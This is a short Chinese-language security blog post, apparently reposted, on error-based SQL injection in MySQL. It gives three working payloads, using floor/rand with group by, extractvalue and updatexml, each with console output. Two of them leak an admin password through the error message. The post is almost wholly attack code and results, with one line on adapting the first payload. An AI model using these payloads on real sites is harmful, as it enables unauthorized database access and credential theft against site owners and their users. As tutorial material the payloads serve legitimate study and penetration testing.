Sql注入之报错注入

  • A+
所属分类:安全博客

这里说下三种SQL报错注入

通过floor报错

mysql> select * from article where id = 1 and (select 1 from  (select count(*),concat(version(),floor(rand(0)*2))x from  information_schema.tables group by x)a);
ERROR 1062 (23000): Duplicate entry '5.1.33-community-log1' for key 'group_key'

注入只需要替换其中的version()为(select 1)即可

通过ExtractValue报错

mysql> select * from article where id = 1 and extractvalue(1, concat(0x5c,(select pass from admin limit 1)));--
ERROR 1105 (HY000): XPATH syntax error: 'admin888'

通过UpdateXml报错

mysql> select * from article where id = 1 and 1=(updatexml(1,concat(0x5e24,(select pass from admin limit 1),0x5e24),1));
ERROR 1105 (HY000): XPATH syntax error: '^$admin888^$'

引用:http://www.111cn.net/database/mysql/47680.htm

FROM :rickyhao.com | rickyhao.com

相关推荐: Pwnable.kr Level 1 Writeup

Pwnable.kr Level 1 Writeup Last updated:Mar.23, 2017 CST 23:47:23 Pwnable.kr Level 1 Writeup collision bof flag passcode random in…

发表评论

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: